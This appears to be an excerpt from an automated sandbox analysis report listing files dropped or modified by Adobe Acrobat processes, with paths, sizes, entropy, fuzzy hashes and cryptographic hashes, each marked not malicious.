Size (bytes): | 16384 |
Entropy (8bit): | 0.07760139725783914 |
Encrypted: | false |
SSDEEP: | 3:9YegqYudAlntSlsVlBcXDJivoll12St/ll/SnPK/t:9zNUtWsPiTRjlf |
MD5: | 5101731FFEDA25793516D94956C01DB5 |
SHA1: | 84FBD70FDF9932EEE347310713D06F2907FA9EA9 |
SHA-256: | 66089D2422CD9CAF28B6D8AA036A9F1D5A6CD1FB3B418498AC2D60C0C4AFF06E |
SHA-512: | DEAAAD28564958044230F542C8190A3450EA925F18D2225A09E9253CB8F274DEDDC8E009304D61D9EB04080DDBDE6EA6AF9E97BC41AFAD5740DA1F4593F0829B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.2283669028064566 |
Encrypted: | false |
SSDEEP: | 6:iO4R5X9+q2Pv2nKuAl9OmbnIFUtSR5B3JZmwsR5B39VkwOv2nKuAl9OmbjLJ:7Qov2HAahFUtKr/Eh5bHAaSJ |
MD5: | D0DF09091C69F39B52C1C6960137F5AD |
SHA1: | A0EB6E5873585FD285BD609CE995276E32E11FC4 |
SHA-256: | DB5E093E158FAABA6329E94C45529E5C3ABC62F877A4222B89DE355641DB5099 |
SHA-512: | A96FC4B8522F2E7443AC8593B837DA874AF63FBB65D80CDD3BBF31DBCF8AE8BB2DCE78E1C722BED0015961EC1A14B91F861BC8FF0E4B5AA0B9E4379B33BE0285 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.2283669028064566 |
Encrypted: | false |
SSDEEP: | 6:iO4R5X9+q2Pv2nKuAl9OmbnIFUtSR5B3JZmwsR5B39VkwOv2nKuAl9OmbjLJ:7Qov2HAahFUtKr/Eh5bHAaSJ |
MD5: | D0DF09091C69F39B52C1C6960137F5AD |
SHA1: | A0EB6E5873585FD285BD609CE995276E32E11FC4 |
SHA-256: | DB5E093E158FAABA6329E94C45529E5C3ABC62F877A4222B89DE355641DB5099 |
SHA-512: | A96FC4B8522F2E7443AC8593B837DA874AF63FBB65D80CDD3BBF31DBCF8AE8BB2DCE78E1C722BED0015961EC1A14B91F861BC8FF0E4B5AA0B9E4379B33BE0285 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 336 |
Entropy (8bit): | 5.173456600595221 |
Encrypted: | false |
SSDEEP: | 6:iO4R1lL+q2Pv2nKuAl9Ombzo2jMGIFUtSR01ZmwsRGEFlLVkwOv2nKuAl9Ombzos:7/v2HAa8uFUt71/3o5bHAa8RJ |
MD5: | FE811F8EA16118C44E1B2CBE8622802F |
SHA1: | 2F5923F23EBD9E0F5372DF93201A147436F0335B |
SHA-256: | E0837A97E5E3D69128626DF188B1B4B902480FB858DB0C71F39F6D89B922DC0F |
SHA-512: | 2764F41F896987D2DB012688E8610E06BC06DC3E2C873FE5F46F7D886DA2BF03DB2C67EE67EACB51523BFCC4FEFB45D70F04A7668B33A6C9A7FD140A14C933C8 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 336 |
Entropy (8bit): | 5.173456600595221 |
Encrypted: | false |
SSDEEP: | 6:iO4R1lL+q2Pv2nKuAl9Ombzo2jMGIFUtSR01ZmwsRGEFlLVkwOv2nKuAl9Ombzos:7/v2HAa8uFUt71/3o5bHAa8RJ |
MD5: | FE811F8EA16118C44E1B2CBE8622802F |
SHA1: | 2F5923F23EBD9E0F5372DF93201A147436F0335B |
SHA-256: | E0837A97E5E3D69128626DF188B1B4B902480FB858DB0C71F39F6D89B922DC0F |
SHA-512: | 2764F41F896987D2DB012688E8610E06BC06DC3E2C873FE5F46F7D886DA2BF03DB2C67EE67EACB51523BFCC4FEFB45D70F04A7668B33A6C9A7FD140A14C933C8 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 476 |
Entropy (8bit): | 4.967297934690531 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqPlXhsBdOg2Hagcaq3QYiubPP7E4T3y:Y2sRdsQNydMHS3QYhbH7nby |
MD5: | 216C107121BC6B6AD849E6856EF8409B |
SHA1: | 6FD56898384747BB750C11F305856767E1134EFB |
SHA-256: | 5218F2071D11B90F32B2EC73D88FFE57A5C8B02EB2050C0287427967744A840D |
SHA-512: | 323AA4E53D8C35DB90356F7207C25B937F038A3CCA84B1CD500888AEF71F75DA6B71BA68D467CB3A69DB3E2386483495EC9B159605E49FA8377BCC23436A9943 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\ab70f1c3-98ea-4221-b0a6-8d593a51ecc8.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 476 |
Entropy (8bit): | 4.967297934690531 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqPlXhsBdOg2Hagcaq3QYiubPP7E4T3y:Y2sRdsQNydMHS3QYhbH7nby |
MD5: | 216C107121BC6B6AD849E6856EF8409B |
SHA1: | 6FD56898384747BB750C11F305856767E1134EFB |
SHA-256: | 5218F2071D11B90F32B2EC73D88FFE57A5C8B02EB2050C0287427967744A840D |
SHA-512: | 323AA4E53D8C35DB90356F7207C25B937F038A3CCA84B1CD500888AEF71F75DA6B71BA68D467CB3A69DB3E2386483495EC9B159605E49FA8377BCC23436A9943 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3878 |
Entropy (8bit): | 5.208955761901778 |
Encrypted: | false |
SSDEEP: | 96:GQux1TtQoLOdBrjx5uaLOKhtr8OU8tZdUtFuHHoQHh0O/WOR:zux1TNOdBrjxQIOK/4OvZdUPuHHoQHh9 |
MD5: | A6E9A020C2C0D72BEADC826D16D240CF |
SHA1: | C1177E307295A32955B458B10F2AF88DD734D698 |
SHA-256: | 9A527A1E061978067B3F76E316A114B07467D431D029F30D00AB49529E7D4E9C |
SHA-512: | 4DC9A6D9B6330602966813312CB9C9B11078E8B926A0D0E03DB64B5F45DC17DC9CC0B7F0B5B845AF449C10350832E48AB3D9E5E2F979CE44BD4B33ED7B74AC34 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 324 |
Entropy (8bit): | 5.162538142329429 |
Encrypted: | false |
SSDEEP: | 6:iO4Rj+lL+q2Pv2nKuAl9OmbzNMxIFUtSRj2sz1ZmwsRjdFFlLVkwOv2nKuAl9Omk:72v2HAa8jFUt2z1/wr5bHAa84J |
MD5: | 14655C707FBF51FC4E07058D192DBA2E |
SHA1: | 90F9F3276912E80C54DCB06109D2F636CFF4008D |
SHA-256: | 9436941734308F7BCFB77EC34C40F36E390ABDF72DD9AE9A1EBFAF278E265FC2 |
SHA-512: | 9CE1C472B14F14A3B4921131A8C838A4A0FB3E3CF9D151296C7BBD64FC824D6A8E5E8D8DEAA87E6F655DCFF6D2417C8B2D9FBD81CA1B0B9F86F66639DF063C79 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 324 |
Entropy (8bit): | 5.162538142329429 |
Encrypted: | false |
SSDEEP: | 6:iO4Rj+lL+q2Pv2nKuAl9OmbzNMxIFUtSRj2sz1ZmwsRjdFFlLVkwOv2nKuAl9Omk:72v2HAa8jFUt2z1/wr5bHAa84J |
MD5: | 14655C707FBF51FC4E07058D192DBA2E |
SHA1: | 90F9F3276912E80C54DCB06109D2F636CFF4008D |
SHA-256: | 9436941734308F7BCFB77EC34C40F36E390ABDF72DD9AE9A1EBFAF278E265FC2 |
SHA-512: | 9CE1C472B14F14A3B4921131A8C838A4A0FB3E3CF9D151296C7BBD64FC824D6A8E5E8D8DEAA87E6F655DCFF6D2417C8B2D9FBD81CA1B0B9F86F66639DF063C79 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.438259883063595 |
Encrypted: | false |
SSDEEP: | 384:SeCci5GxiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:99urVgazUpUTTGt |
MD5: | BC63D37C3385D7695D25F33AAB088EB7 |
SHA1: | B1C18B29C2EF22D32EC488A64FD7A45A261A5625 |
SHA-256: | 310EFB7BD6A908A9E60F8933B775802553BF5F115EE000E9280D6CD764C8C1C3 |
SHA-512: | A703A5F860FA14495D36275E31F0DDC7CF707EF9C10F75230AACDD42332712353BE481279EDA5314856FA4EC16F51870D97FF1F79E1F516540CD203581C3EFAC |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.2118818164246528 |
Encrypted: | false |
SSDEEP: | 24:7+tnSIO6wK4qLLzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf99:7MS1W4qPmFTIF3XmHjBoGGR+jMz+Lhr |
MD5: | 221E4F1916E663E48727F7EF6AF69953 |
SHA1: | A60A1028DB2A1F4BD0F2D2C82C4F300772FD1A52 |
SHA-256: | 49DD3732514059CED6FE3303C0A05590AB678211403E33B79752239B5D7EF01D |
SHA-512: | A8F96E9C8CF8FE9AFF60BDC88C6B23189721BCDDA323DFC2FF10FF05D5B888C676ED16942F6FDD0091BBDDD8B31E1023ACCE7D1E00BD380CE3D3DA4DB573009F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7425532007658724 |
Encrypted: | false |
SSDEEP: | 3:kkFklM7dtfllXlE/HT8ktI7l/tNNX8RolJuRdxLlGB9lQRYwpDdt:kKV7deT8kIRNMa8RdWBwRd |
MD5: | D6BF34ED9BE617079D955D92E0AF6893 |
SHA1: | F350EADDFAD19CFF16C0AB1359ACCA339D01FDCB |
SHA-256: | 3D1C445AA94FFB4978B480033375BC49A51E47412B5072E3E7154A628DF43DBC |
SHA-512: | D01994E42D5044981BF6D914A4D07EA94F205CE85417A012BF29EC0814EFC07CA5ACD84EEAF816E067CB16554010EC482FC5DA1258B72A54A703F57FC43422D0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 328 |
Entropy (8bit): | 3.2429904267830576 |
Encrypted: | false |
SSDEEP: | 6:kKEL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:MiDImsLNkPlE99SNxAhUe/3 |
MD5: | C8B7AA965F75E515D6F8C6939A0B7F8D |
SHA1: | 48FCDD398BCC8917677174C0A088698B6DAF9B53 |
SHA-256: | 87D0692F384D3FDB285E4A1C8862765755B596BE86BC947EC4410BBE739DFAFD |
SHA-512: | 8895D546A74FA81CE6C6BB08E1D424C57302208A8C359D7D798E3BF717070201D2613BAFD1EB8AA84F9C43E76E97F075BB389751494C10ED625346C618B76087 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.366757962013625 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXeW8h5aG6QQdhlzFkF0YcnTJKoAvJM3g98kUwPeUkwRe9:YvXKXe3laZN95GMbLUkee9 |
MD5: | 0C1B1CFDADE40D63338A8B67319AC1C7 |
SHA1: | ACDE6C3CE3FAAD8C71759FC72C963E1F2895778E |
SHA-256: | C2ADA734C07188C194E1F29190FB570CD75C679A300625A7E2F82EC3D7CD7999 |
SHA-512: | 16B8E61E57A0679FF7D7CD9141CBE1954AEABEFE93DDEF1A8E1E6150162CD69F2466709C616BBD3AF384726C497820B84231321FF7A517F77A8F875B69E85FAB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.3083764704843235 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXeW8h5aG6QQdhlzFkF0YcnTJKoAvJfBoTfXpnrPeUkwRe9:YvXKXe3laZN95GWTfXcUkee9 |
MD5: | 0203DD7EFCDD49EE03A1957E1E6F7558 |
SHA1: | 0B1A270549F8FB46B677E7DB175CB5F7176EE372 |
SHA-256: | 38909BB4C0261476C43090BE5275DEA35146AABA33B2106CC42EBBE9E75A392A |
SHA-512: | 31E3809AF8A55B4074B4C1F2F60858579EFC4F7CD5BF86E07451E95440874E6F1209B30A06CE399DC6936DB730B3CC6D26543B81B535D5B23AB640DDBAABD75F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.286226564061393 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXeW8h5aG6QQdhlzFkF0YcnTJKoAvJfBD2G6UpnrPeUkwRe9:YvXKXe3laZN95GR22cUkee9 |
MD5: | 371FE30132AB29134F53F629E76A16E3 |
SHA1: | C438EE77B6262BBA7D21EE8F938E0C02FF9B280C |
SHA-256: | 96DB263183290F45D0AFDC0FC3F2166AE04FE70A014722C974FAFE59494EFC97 |
SHA-512: | 7391A4758C9119BE41C10AC84B97012888A2A5F1D2EBF6BF8B3D56337413295B8C0FB497F079642022DB9901584A04DB7ED492993EC609C41472BCCF3FCA8A7D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.347016853250647 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXeW8h5aG6QQdhlzFkF0YcnTJKoAvJfPmwrPeUkwRe9:YvXKXe3laZN95GH56Ukee9 |
MD5: | 47637A924CCF7F7CE30EC20D849B3F36 |
SHA1: | 5866DBA56A181586955428C9F0621455189A293D |
SHA-256: | C154B5E3B9A8DDB46D435F3B395CDA879CA5264BD6E3FF57C589838696071887 |
SHA-512: | 924EA2FB45C865CE7EA0FBE5E8746E4CC7914FC9DF42EC62237A4288C032D3037B45C8558BC1B50C7D6835A06FD2B6D95D6384A0D044023D70F920233AA112A6 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.688964683898628 |
Encrypted: | false |
SSDEEP: | 24:Yv6Xe3EZN9epLgE9cQx8LennAvzBvkn0RCmK8czOCCS2L:Yv93EZ2hgy6SAFv5Ah8cv/2L |
MD5: | C0446EF630C8DFB4FAD016988E83CBD8 |
SHA1: | 377CF05FD77BC9D848B46356FDD985982BFD8635 |
SHA-256: | 5F50CE285F471EA653256752D9A02708E516C02FAE4F6307EDE94630F1D2D3F5 |
SHA-512: | 1F587168C0AC49C4C81BE000D7B21D336B8FD2C29DFFA44F3166324BC8A990BE49CDFC7D68A6578A6E2FF4535B7682D6F8F255868CF6F04DDC31B8E5157F88B2 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.300969900098209 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXeW8h5aG6QQdhlzFkF0YcnTJKoAvJf8dPeUkwRe9:YvXKXe3laZN95GU8Ukee9 |
MD5: | 886A1F05C1CD4B10402F74260DD68A86 |
SHA1: | 2BDD65749898A764FF3CDA4BF276B7A7409EDC9E |
SHA-256: | 31BB42B79B7DFDEA123136FDBE9D380C9E1CCCD070FAEB30C23657E1BD8B773E |
SHA-512: | 8EEA169C7D53699343FAFEDFE9DD832BAF3B5640E4EE910FBBFBBF78E02FD715CC193A97CD6977F5C749F7DAD54FBDFA9A7F61592D5D0151442776BB244B724E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.299638903012676 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXeW8h5aG6QQdhlzFkF0YcnTJKoAvJfQ1rPeUkwRe9:YvXKXe3laZN95GY16Ukee9 |
MD5: | 06301D9596B8EEB4FD8AA6FC333B5359 |
SHA1: | ADDB96B7DE97A5F64BFB5ABB2A10F494E2282349 |
SHA-256: | CC39A8B60EAB4AD7804C1906119ED473DC5710FE455D429F294221B4DA541727 |
SHA-512: | C0E6430E2879F8CDEED8BC94A4109F9B68CB4E227CC1C7445CF9EDAB3C13F063190F7372F965DA585BE431C6D7B271B68E0FE7791FE519D1EAB3BEAF87C0877B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.315606011428021 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXeW8h5aG6QQdhlzFkF0YcnTJKoAvJfFldPeUkwRe9:YvXKXe3laZN95Gz8Ukee9 |
MD5: | 0B37317F707403659CAA203A261A2B5A |
SHA1: | CEDDE891B9680765E0F03A28811C3B6D98F59F24 |
SHA-256: | 4FA74757B7C8801A81626B9E982D53CC608E547492B318471DAA13EEAF1D4A04 |
SHA-512: | 49AA4D953CA949D7FA0865321C49F4E4CB18BFCF4349AB3AA4124EE4619878CD880170C9CB420C1D6E77D2D8362BCCDFADA2FF84A682A2FA2E5D953B62A0DFDF |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.327202361816283 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXeW8h5aG6QQdhlzFkF0YcnTJKoAvJfzdPeUkwRe9:YvXKXe3laZN95Gb8Ukee9 |
MD5: | E60D5951E3607B9C15091DB3F2AEB348 |
SHA1: | 374CE3ADA65443A20245F312D65406B6DC3540AA |
SHA-256: | 11627ED758E594D5D12DDE2B8C0AFE4283A36CCBC443990BF12E80F389F5EE95 |
SHA-512: | 954EACB21EF7201B3DE2006DBFF839BCED24A4188B4FE3333F93E16478491B2D8C3FC5A9D8DD4C2494BD792A0B70FDF1A861B4C3664BA82F1D184B77F461E2BA |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.308008846615528 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXeW8h5aG6QQdhlzFkF0YcnTJKoAvJfYdPeUkwRe9:YvXKXe3laZN95Gg8Ukee9 |
MD5: | 549D9320A1EEDA9D9773D6031B3F904B |
SHA1: | 5792EF638BDFE11B9C98C0F00500C8F9FD7C8630 |
SHA-256: | A79BFAE07921D4725E9C813CAA45519D833DDB46FAB15B74217B1D934851EB48 |
SHA-512: | 952CF1C3BF2505EC7F468E0132D6A455A2BDCFE8F36FBB8E236358A82652EAD5A949872CC03B90CFADD8461BCDFABF583002E0E4E87B1A5B3B0F495E0E48C2FB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.294200220259097 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXeW8h5aG6QQdhlzFkF0YcnTJKoAvJf+dPeUkwRe9:YvXKXe3laZN95G28Ukee9 |
MD5: | 18F5CE6E461656FC0437793CB22BF41B |
SHA1: | 5262083EB174F76CBCB4933B8BE54BFDCB14A775 |
SHA-256: | 1FBE9321B6C412D7CE182E753349A3DCB12082BDC3DA4074599BF7D4A9F1B2C5 |
SHA-512: | 3B85C1F7FDF613DC07C4CA99823F1C27DC7FD9CA6B7839F7FB4C3C54FBCEB118FB5A03773F613E0676046C6173757DFE1200F51AD790BEFD719BAC246A69925F |
Malicious: | false |
Preview: |
